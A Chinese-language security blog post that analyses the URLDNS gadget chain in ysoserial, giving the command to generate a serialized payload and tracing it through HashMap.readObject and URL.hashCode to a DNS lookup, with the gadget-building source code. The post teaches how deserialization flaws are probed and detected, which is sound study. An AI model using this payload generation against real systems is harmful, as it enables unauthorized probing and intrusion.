借助ysoserial分析URLDNS

2024-06-22 333 0

反序列化漏洞和ysoserial的简单介绍

序列化漏洞在Java安全领域已经是一个几乎人人都了解的漏洞了,这里就不再多言,直接引用GPT对其的介绍:

Java反序列化漏洞是一种安全漏洞,通常出现在Java应用程序中。这种漏洞的根本是由于Java序列化机制的特性。Java序列化允许对象在网络上传输或持久化到磁盘上,而无需手动编写代码。但是,如果不谨慎处理反序列化,攻击者可以通过精心构造的恶意序列化数据来执行任意代码,从而导致严重的安全问题。

这些漏洞可能会出现在应用程序中,特别是当应用程序接受并反序列化未经验证的数据时。攻击者可以通过注入恶意的序列化数据来利用这些漏洞,执行远程代码执行(RCE)攻击,从而完全控制受影响的系统。

为了防止Java反序列化漏洞,开发人员应该使用安全的反序列化方法,如白名单机制,以确保只有预期的类可以被反序列化。此外,及时修补已知的漏洞,并确保应用程序的所有输入都经过严格的验证和过滤,以防止恶意数据输入。

ysoserial是一个流行的Java工具,用于生成恶意序列化payload,用于利用Java应用程序中的反序列化漏洞。ysoserial中集成了很多已经披露的Java反序列化漏洞的利用链,可以非常便捷地生成恶意的序列化对象。项目地址:GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

ysoserial的简单入手

简单了解ysoserial

  • ysoserial是一个生成java序列化payload的工具

  • 大致使用方式如下

    • 可以查看可用的利用链
      借助ysoserial分析URLDNS插图

    • 序列化对象,并输出到文件

# URLDNS为利用链,http://test.io为要执行的命令,当然这里由于URLDNS的特殊性,不能执行命令,这里的链接只是进行一次dnslog,payload.bin则是将序列化对象输出到文件
java -jar ysoserial-all.jar URLDNS http://test.io > payload.bin

利用notepad++等编辑器可以查看我们生成的payload文件
借助ysoserial分析URLDNS插图1

ysoserial的对于URLDNS的简单调试

前面对于ysoserial的使用只是直接生成了攻击的序列化对象,我们并不了解整个攻击链的形成,借助对于ysoserial源码的分析,我们可以了解整个攻击链是如何形成的.我们可以通过调试ysoserial的源码,了解一条序列化链从生成到执行的全过程.

  • 下载并在idea中搭建项目(https://github.com/frohoff/ysoserial)

  • 找到URLDNS的相关类
    借助ysoserial分析URLDNS插图2

  • 可能是作者为了方便大家调试,这里在idea中直接运行该类包括序列化和反序列化两个过程,也就是生成和利用一步到位.运行时记得设置参数,这里设置的为dnslog的目标.
    借助ysoserial分析URLDNS插图3
    借助ysoserial分析URLDNS插图4
    借助ysoserial分析URLDNS插图5
    接下来让我们简单分析一下URLDNS序列化和反序列化的过程:

  • URLDNS.main调用PayloadRunner.run(URLDNS.class, args)

  • PayloadRunner.run(URLDNS.class, args)中通过反射获取URLDNS.class实例,然后通过getObject得到要序列化的对象

  • 调用相关工具类Serializer.serialize(objBefore)序列化对象

  • 调用相关工具类Deserializer.deserialize(serialized)反序列化对象,利用完成

分析URLDNS

  • 直接在反序列化处下断点,对其进行调试,这里我们也不可能去复现最初发现者的发现流程,我们就根据已知的信息,是HashMap的readObject函数中的putVal(hash(key), key, value, false, false);触发了漏洞,在该处下一个断点,分析其前后的调用链

// PayloadRunner调研相关工具类反序列化对象
final Object objAfter = Deserializer.deserialize(serialized);

// 反序列化的方法
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
		final ObjectInputStream objIn = new ObjectInputStream(in);
		return objIn.readObject();
	}

// 反序列化目标HashMap对象自身的readObject,在putVal(hash(key), key, value, false, false);的hash(key)进入下一步,key是URL类
 private void readObject(ObjectInputStream s)
        throws IOException, ClassNotFoundException {

        ObjectInputStream.GetField fields = s.readFields();

        // Read loadFactor (ignore threshold)
        float lf = fields.get("loadFactor", 0.75f);
        if (lf <= 0 || Float.isNaN(lf))
            throw new InvalidObjectException("Illegal load factor: " + lf);

        lf = Math.min(Math.max(0.25f, lf), 4.0f);
        HashMap.UnsafeHolder.putLoadFactor(this, lf);

        reinitialize();

        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0) {
            throw new InvalidObjectException("Illegal mappings count: " + mappings);
        } else if (mappings == 0) {
            // use defaults
        } else if (mappings > 0) {
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);

            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
            Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

// 又调用了URL的hashCode()
static final int hash(Object key) {
        int h;
        return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
    }

// handler.hashCode(this)又调用了URLStreamHandler的hashCode
public synchronized int hashCode() {
        if (hashCode != -1)
            return hashCode;

        hashCode = handler.hashCode(this);
        return hashCode;
    }

// 关注InetAddress addr = getHostAddress(u);继续跟进
protected int hashCode(URL u) {
        int h = 0;

        // Generate the protocol part.
        String protocol = u.getProtocol();
        if (protocol != null)
            h += protocol.hashCode();

        // Generate the host part.
        InetAddress addr = getHostAddress(u);
        if (addr != null) {
            h += addr.hashCode();
        } else {
            String host = u.getHost();
            if (host != null)
                h += host.toLowerCase().hashCode();
        }

        // Generate the file part.
        String file = u.getFile();
        if (file != null)
            h += file.hashCode();

        // Generate the port part.
        if (u.getPort() == -1)
            h += getDefaultPort();
        else
            h += u.getPort();

        // Generate the ref part.
        String ref = u.getRef();
        if (ref != null)
            h += ref.hashCode();

        return h;
    }

// 实际上调研了URL类的getHostAddress
protected InetAddress getHostAddress(URL u) {
        return u.getHostAddress();
    }

//  hostAddress = InetAddress.getByName(host)已经很直观了,从方法名和变量名就可以看出从host获取ip,就进行了dns查询
synchronized InetAddress getHostAddress() {
        if (hostAddress != null) {
            return hostAddress;
        }

        if (host == null || host.isEmpty()) {
            return null;
        }
        try {
            hostAddress = InetAddress.getByName(host);
        } catch (UnknownHostException | SecurityException ex) {
            return null;
        }
        return hostAddress;
    }
  • 前文中,URLDNS序列化和反序列化的过程中,通过URLDNS类的getObject获取了要反序列化的对象,在分析完了URLDNS链反序列化的过程后,让我们分析一下该方法

public Object getObject(final String url) throws Exception {

                // SilentURLStreamHandler是我们继承URLStreamHandler实现的一个类,为了满足反序列化漏洞的触发链条
                URLStreamHandler handler = new SilentURLStreamHandler();

                // HashMap的readObject是触发漏洞的直接原因
                HashMap ht = new HashMap(); 
                URL u = new URL(null, url, handler); 
                ht.put(u, url); 

                Reflections.setFieldValue(u, "hashCode", -1); 

                return ht;
        }

static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }

URLDNS的特殊意义

  • URLDNS没有用到其他第三方库类,如果有反序列化点,可以用于探测反序列化漏洞是否存在


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论